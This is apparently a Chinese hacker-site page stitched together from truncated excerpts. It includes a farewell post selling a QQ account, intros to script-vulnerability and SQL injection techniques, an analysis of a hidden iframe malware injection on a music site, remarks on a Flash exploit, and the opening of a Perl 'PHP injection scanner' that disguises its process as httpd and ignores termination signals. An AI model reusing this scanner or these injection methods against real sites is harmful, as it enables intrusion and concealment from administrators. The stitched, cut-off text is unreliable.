摇身一变,让你拥有资深黑客的人脉!

由于居住地的变动(或者说是移民)以致对国内大部分的网络资源无法正常使用.

和悟空最近身体和状态不适,打算暂时离开网络.

本人决定变卖所有关于低调de悟空的网络资源:

1 我的QQ号 : 89009

不经意间写了这么多文章.

真的有点累了,

想歇歇.

其实很久都没做什么事了.

离开网络一段时间,

还没想好去做什么,

可能去旅行.

想换个环境生活,

到哪里都是客人,都是流浪.

有人说:

鱼的流浪是为了觅食,

狼的流浪是为了躲枪.

人的流浪则介于此之间.

也许我就属于这类人,

生下来就注定要忍受孤独,

常常这样安慰自己:

上天你注定我的孤独但注定不了我的平庸,

而我还是很平庸,

过着平庸的生活.

来源:安全中国

随着网络经济的复舒，开始越来越多的网站涌现出来，随着脚本漏洞的挖掘，黑客也越来越猖狂，并且越来越低龄化和傻瓜化。“你只要会用一个工具就可以黑站”，这就是脚本漏洞利的特点。这些漏洞的主要成因是编程程序员的素质，往往在编写asp或php等程序时候对字符的过滤不严密，对注入漏洞不了解，或者某个参数忘记检查导致的。



由于编写网页程序这个行业的入门门槛不高，程序员的水平及经验也参差不齐，相当大一部分程序员在编写代码的时候，没有对用户输入数据的合法性进行

来源:安全中国

对于经常玩SQL Injection的朋友来说，对于字符的猜解，通常是一件枯燥、乏味、痛苦的事情，特别是中文字符的探测。一遍遍的输入，然后又一次次的被否决。不过，据说这对于耐心的培养是一个非常好的办法。这时，你有没有想过自动注入呢？请看我写的文章SQL Server数据信息自动探测。（做个广告，别扔鸡蛋，不然我今天晚上就不用吃饭了。）

SQL Server中的汉字猜解
在SQL Server中，中文的ASCII为正数，但由于是UNICODE的双位编码，不能用函数ascii()取得ASCII码，必须用函数unicode ()返回u

作者： yimike
来源： 剑盟

近来有朋友反映酷狗音乐首页挂马，而且奇怪的是只有第一次访问该页时杀软会提示挂马；之后除非换IP，否则无论怎么刷新杀软都不会提示网页挂马。于是循着这个线索，打开了酷狗音乐首页(h**p://www.kugou.com/home)，最终找到了极其隐蔽的挂马。

详细过程如下：

1.h**p://www.kugou.com/home该页面代码看似正常，但是有个看起来比较正常但是却比较隐蔽的iframe,代码如下：

<IFRAME marginWidth=0 margin

作者：zodiacsoft
来源：天鹅糊&&乌鸦酱

[Toooooooooooooooooold]

也就是CVE-2007-0071，flash9x.ocx存在问题，版本一直影响到9.0.115。
漏洞本身很简单，Dowd的思考方向没有脱离大众，但关键在于相当牛逼的一系列利用技巧。具体的细节Dowd写了一篇很棒的paper，估计很多人看了， 也有很多人做了。文章我仔细拜读了一次，但出于某些原因，没有去动手做出最后的成品，以后也不打算做，这个东西不是手把手说怎么触发利用的，而是一些关于 那篇文章的勘误和另一些周边小问题的补充。

第一个

#!/usr/bin/perl
 
use LWP::Simple;
use IO::Socket::INET;
 
 
 
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
print "\t[ PHP injection scanner 5.0 priv8 version \n\n\n";
 
if(!@ARGV[0]){
print "\t[ use: perl php5.0.pl <procura> ]\n\n";
exit;
}
print "\t[ Camuflando pid ]\n";
my $processo = "/usr/local/sbin/httpd - spy";
$SIG{"INT"} = "IGNORE";
$SIG{"HUP"} = "IGNORE";
$SIG{"TERM"}